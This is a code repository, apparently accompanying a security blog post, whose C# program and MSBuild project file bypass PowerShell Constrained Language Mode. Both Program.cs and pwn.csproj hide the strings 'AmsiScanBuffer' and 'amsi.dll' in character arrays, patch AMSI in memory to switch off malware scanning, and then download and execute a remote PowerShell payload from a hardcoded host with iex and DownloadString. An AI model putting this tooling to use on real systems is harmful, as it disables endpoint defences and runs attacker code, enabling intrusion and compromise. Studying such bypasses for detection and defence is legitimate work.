├── README.md
├── Bypass
    ├── obj
    │   ├── Debug
    │   │   ├── Bypass.csproj.CoreCompileInputs.cache
    │   │   ├── Bypass.csprojAssemblyReference.cache
    │   │   └── DesignTimeResolveAssemblyReferencesInput.cache
    │   └── Release
    │   │   ├── Bypass.csproj.CoreCompileInputs.cache
    │   │   ├── Bypass.exe
    │   │   ├── Bypass.pdb
    │   │   ├── Bypass.csprojAssemblyReference.cache
    │   │   └── Bypass.csproj.FileListAbsolute.txt
    ├── bin
    │   └── Release
    │   │   ├── Bypass.exe
    │   │   ├── Bypass.pdb
    │   │   ├── System.Management.Automation.dll
    │   │   └── Bypass.exe.config
    ├── packages.config
    ├── App.config
    ├── packages
    │   └── System.Management.Automation.dll.10.0.10586.0
    │   │   ├── lib
    │   │       └── net40
    │   │       │   └── System.Management.Automation.dll
    │   │   └── System.Management.Automation.dll.10.0.10586.0.nupkg
    ├── Bypass.sln
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── Program.cs
    └── Bypass.csproj
└── Msbuild
    └── pwn.csproj


/README.md:
--------------------------------------------------------------------------------
1 | # CLMBypassBlogpost
2 | This code was used for the blogpost on secjuice.
3 | 


--------------------------------------------------------------------------------
/Bypass/obj/Debug/Bypass.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 10dc6330d3c4ccb9b5efb92f02d3bae9eef4a977
2 | 


--------------------------------------------------------------------------------
/Bypass/obj/Release/Bypass.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 3bbc6ee6b681bd333f96a72558744def909e9f0d
2 | 


--------------------------------------------------------------------------------
/Bypass/bin/Release/Bypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/bin/Release/Bypass.exe


--------------------------------------------------------------------------------
/Bypass/bin/Release/Bypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/bin/Release/Bypass.pdb


--------------------------------------------------------------------------------
/Bypass/obj/Release/Bypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/obj/Release/Bypass.exe


--------------------------------------------------------------------------------
/Bypass/obj/Release/Bypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/obj/Release/Bypass.pdb


--------------------------------------------------------------------------------
/Bypass/bin/Release/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/bin/Release/System.Management.Automation.dll


--------------------------------------------------------------------------------
/Bypass/obj/Debug/Bypass.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/obj/Debug/Bypass.csprojAssemblyReference.cache


--------------------------------------------------------------------------------
/Bypass/obj/Release/Bypass.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/obj/Release/Bypass.csprojAssemblyReference.cache


--------------------------------------------------------------------------------
/Bypass/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache


--------------------------------------------------------------------------------
/Bypass/packages.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <packages>
3 |   <package id="System.Management.Automation.dll" version="10.0.10586.0" targetFramework="net472" />
4 | </packages>


--------------------------------------------------------------------------------
/Bypass/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/Bypass/bin/Release/Bypass.exe.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/Bypass/packages/System.Management.Automation.dll.10.0.10586.0/lib/net40/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/packages/System.Management.Automation.dll.10.0.10586.0/lib/net40/System.Management.Automation.dll


--------------------------------------------------------------------------------
/Bypass/packages/System.Management.Automation.dll.10.0.10586.0/System.Management.Automation.dll.10.0.10586.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MinatoTW/CLMBypassBlogpost/HEAD/Bypass/packages/System.Management.Automation.dll.10.0.10586.0/System.Management.Automation.dll.10.0.10586.0.nupkg


--------------------------------------------------------------------------------
/Bypass/obj/Release/Bypass.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
 1 | C:\Users\sjaiswal\source\repos\Bypass\bin\Release\Bypass.exe.config
 2 | C:\Users\sjaiswal\source\repos\Bypass\bin\Release\Bypass.exe
 3 | C:\Users\sjaiswal\source\repos\Bypass\bin\Release\Bypass.pdb
 4 | C:\Users\sjaiswal\source\repos\Bypass\bin\Release\System.Management.Automation.dll
 5 | C:\Users\sjaiswal\source\repos\Bypass\obj\Release\Bypass.csprojAssemblyReference.cache
 6 | C:\Users\sjaiswal\source\repos\Bypass\obj\Release\Bypass.csproj.CoreCompileInputs.cache
 7 | C:\Users\sjaiswal\source\repos\Bypass\obj\Release\Bypass.csproj.CopyComplete
 8 | C:\Users\sjaiswal\source\repos\Bypass\obj\Release\Bypass.exe
 9 | C:\Users\sjaiswal\source\repos\Bypass\obj\Release\Bypass.pdb
10 | 


--------------------------------------------------------------------------------
/Bypass/Bypass.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.28711.60
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass.csproj", "{1BB46B35-0938-453F-82D1-8FE83D95F303}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{1BB46B35-0938-453F-82D1-8FE83D95F303}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{1BB46B35-0938-453F-82D1-8FE83D95F303}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{1BB46B35-0938-453F-82D1-8FE83D95F303}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{1BB46B35-0938-453F-82D1-8FE83D95F303}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {64F2FF56-1F1D-4C74-8800-78D504AA2533}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/Bypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("Bypass")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Bypass")]
13 | [assembly: AssemblyCopyright("Copyright ©  2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1bb46b35-0938-453f-82d1-8fe83d95f303")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/Bypass/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.ObjectModel;
 3 | using System.Runtime.InteropServices;
 4 | using System.Management.Automation;
 5 | using System.Management.Automation.Runspaces;
 6 | 
 7 | namespace Bypass { 
 8 |     public class BypassCLM
 9 |     {
10 |         [DllImport("kernel32")]
11 |         public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
12 | 
13 |         [DllImport("kernel32")]
14 |         public static extern IntPtr LoadLibrary(string name);
15 | 
16 |         [DllImport("kernel32")]
17 |         public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
18 | 
19 |         static int Bypass()
20 |         {
21 |             char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
22 |             String funcName = string.Join("", chars);
23 |             
24 |             char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
25 |             String libName = string.Join("", chars2);
26 |             
27 |             IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
28 | 
29 |             UIntPtr size = (UIntPtr)5;
30 |             uint p = 0;
31 | 
32 |             VirtualProtect(Address, size, 0x40, out p);
33 |             Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
34 |             Marshal.Copy(Patch, 0, Address, 6);
35 | 
36 |             return 0;
37 | 
38 |         }
39 |         public static void Main(String[] args)
40 |         {
41 |             Runspace run = RunspaceFactory.CreateRunspace();
42 |             run.Open();
43 | 
44 |             Console.WriteLine(Bypass());
45 | 
46 |             PowerShell shell = PowerShell.Create();
47 |             shell.Runspace = run;
48 | 
49 |             String exec = "iex(new-object net.webclient).downloadstring('http://192.168.0.103/payload')";  // Modify for custom commands
50 |             shell.AddScript(exec);
51 |             shell.Invoke();
52 | 
53 |             Collection<PSObject> output = shell.Invoke();
54 |             foreach (PSObject o in output)
55 |             {
56 |                 Console.WriteLine(o.ToString());
57 |             }
58 | 
59 |             foreach (ErrorRecord err in shell.Streams.Error)
60 |             {
61 |                 Console.Write("Error: " + err.ToString());
62 |             }
63 |             run.Close();
64 | 
65 |         }
66 |     }
67 | 
68 | }
69 | 


--------------------------------------------------------------------------------
/Bypass/Bypass.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{1BB46B35-0938-453F-82D1-8FE83D95F303}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>Bypass</RootNamespace>
10 |     <AssemblyName>Bypass</AssemblyName>
11 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="System" />
37 |     <Reference Include="System.Core" />
38 |     <Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
39 |       <HintPath>packages\System.Management.Automation.dll.10.0.10586.0\lib\net40\System.Management.Automation.dll</HintPath>
40 |     </Reference>
41 |     <Reference Include="System.Xml.Linq" />
42 |     <Reference Include="System.Data.DataSetExtensions" />
43 |     <Reference Include="Microsoft.CSharp" />
44 |     <Reference Include="System.Data" />
45 |     <Reference Include="System.Net.Http" />
46 |     <Reference Include="System.Xml" />
47 |   </ItemGroup>
48 |   <ItemGroup>
49 |     <Compile Include="Program.cs" />
50 |     <Compile Include="Properties\AssemblyInfo.cs" />
51 |   </ItemGroup>
52 |   <ItemGroup>
53 |     <None Include="App.config" />
54 |     <None Include="packages.config" />
55 |   </ItemGroup>
56 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 | </Project>


--------------------------------------------------------------------------------
/Msbuild/pwn.csproj:
--------------------------------------------------------------------------------
 1 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 2 |          <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe pwn.csproj -->
 3 |          <!-- Bypass CLM and disables AMSI -->
 4 |          <!-- Author: Casey Smith, Twitter: @subTee -->
 5 |          <!-- License: BSD 3-Clause -->
 6 |   <Target Name="Bypass">
 7 |    <BypassCLM/>
 8 |   </Target>
 9 |    <UsingTask
10 |     TaskName="BypassCLM"
11 |     TaskFactory="CodeTaskFactory"
12 |     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
13 |      <Task>
14 |       <Reference Include="System.Management.Automation" />		
15 |       <Code Type="Class" Language="cs">
16 |       <![CDATA[
17 | 			using System;
18 | 			using System.IO;
19 | 			using Microsoft.Build.Framework;
20 | 			using Microsoft.Build.Utilities;
21 | 			using System.ComponentModel;
22 | 			using System.Collections.Generic;
23 | 			using System.Collections.ObjectModel;
24 | 			using System.Runtime.InteropServices;
25 | 			using System.Management.Automation;
26 | 			using System.Management.Automation.Runspaces;
27 | 
28 | 
29 |       public class BypassCLM : Task, ITask
30 |       {
31 |          [DllImport("kernel32")]
32 |          public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
33 |  
34 |          [DllImport("kernel32")]
35 |          public static extern IntPtr LoadLibrary(string name);
36 | 
37 |          [DllImport("kernel32")]
38 |          public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
39 | 
40 |          static int Bypass()
41 |          {
42 |               char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
43 |               String funcName = string.Join("", chars);
44 |             
45 |               char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
46 |               String libName = string.Join("", chars2);
47 |             
48 |               IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
49 | 
50 |               UIntPtr size = (UIntPtr)5;
51 |               uint p = 0;
52 | 
53 |               VirtualProtect(Address, size, 0x40, out p);
54 |               Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
55 |               Marshal.Copy(Patch, 0, Address, 6);
56 | 
57 | 	      	  return 0;
58 |           }
59 | 
60 |           public override bool Execute()
61 |           {
62 |               Runspace run = RunspaceFactory.CreateRunspace();
63 |               run.Open();
64 | 
65 |               Console.WriteLine(Bypass());
66 | 
67 |               PowerShell shell = PowerShell.Create();
68 |               shell.Runspace = run;
69 | 
70 |               String exec = "iex(new-object net.webclient).downloadstring('http://192.168.0.103/payload')"; // Modify for custom commands
71 |               shell.AddScript(exec);
72 |               shell.Invoke();
73 | 
74 |               Collection<PSObject> output = shell.Invoke();
75 |               foreach( PSObject o in output )
76 |               {
77 |                   Console.WriteLine(o.ToString());
78 |               }
79 | 
80 |               foreach( ErrorRecord err in shell.Streams.Error )
81 |               {
82 |                   Console.Write("Error: " + err.ToString());
83 |               }
84 |               run.Close();
85 |             
86 |               return true;
87 | 
88 |           }
89 |        }
90 |       ]]>
91 |       </Code>
92 |     </Task>
93 |   </UsingTask>
94 | </Project>
95 | 


--------------------------------------------------------------------------------